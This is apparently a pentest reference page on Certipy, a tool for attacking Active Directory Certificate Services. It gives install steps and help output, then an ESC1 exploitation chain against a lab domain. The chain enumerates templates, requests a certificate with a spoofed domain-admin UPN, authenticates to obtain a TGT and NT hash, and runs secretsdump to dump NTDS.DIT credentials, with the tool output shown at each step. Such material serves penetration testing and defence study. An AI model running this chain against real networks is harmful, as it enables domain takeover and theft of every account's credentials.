Active Directory Certificate Services enumeration and abuse.


git clone https://github.com/ly4k/Certipy
sudo python3 setup.py install


certipy [-v] [-h] {account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template} ...


Certipy v4.8.2 - by Oliver Lyak (ly4k)

positional arguments:
    account             Manage user and machine accounts
    auth                Authenticate using certificates
    ca                  Manage CA and certificates
    cert                Manage certificates and private keys
    find                Enumerate AD CS
    forge               Create Golden Certificates
    ptt                 Inject TGT for SSPI authentication
    relay               NTLM Relay to AD CS HTTP Endpoints
    req                 Request certificates
    shadow              Abuse Shadow Credentials for account takeover
    template            Manage certificate templates

  -v, --version         Show Certipy's version number and exit
  -h, --help            Show this help message and exit


For more examples please check the Github Repo.

Finding CA

$ certipy find -u [email protected] -p Welkom1234 -dc-ip
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 9 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 8 enabled certificate templates
[*] Trying to get CA configuration for 'CA01-OFFSEC' via CSRA
[*] Got CA configuration for 'CA01-OFFSEC'
[*] Saved BloodHound data to '202210114803_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '202210114803_Certipy.txt'
[*] Saved JSON output to '202210114803_Certipy.json'

Exploiting ESC1

$ certipy req -u 'crypt0rr.offsec.nl' -p 'Welkom1234' -target 'dc01.offsec.nl' -ca 'CA01-OFFSEC' -template 'ESC1' -upn '[email protected]'
Certipy v4.0.0 - by Oliver Lyak (Ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 707
[*] Got certificate with UP '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'john-da.pfx'
$ certipy auth -pfx 'john-da.pfx' -dc-ip '' -username 'john-da' -domain 'offsec.nl'
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT.
[*] Got TGT
[*] Saved credential cache to john-da.ccache'
[*] Trying to retrieve NT hash for 'john-da'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:caec1e1d755119a15bfb6cd3d5994305
$ secretsdump.py -just-dc -hashes 'aad3b435b51404eeaad3b435b51404ee:caec1e1d755119a15bfb6cd3d5994305' 'offsec.nl/[email protected]'
Impacketv0.10.1.dev1+20220504.120002.d5097759 - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\id:rid: lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

URL List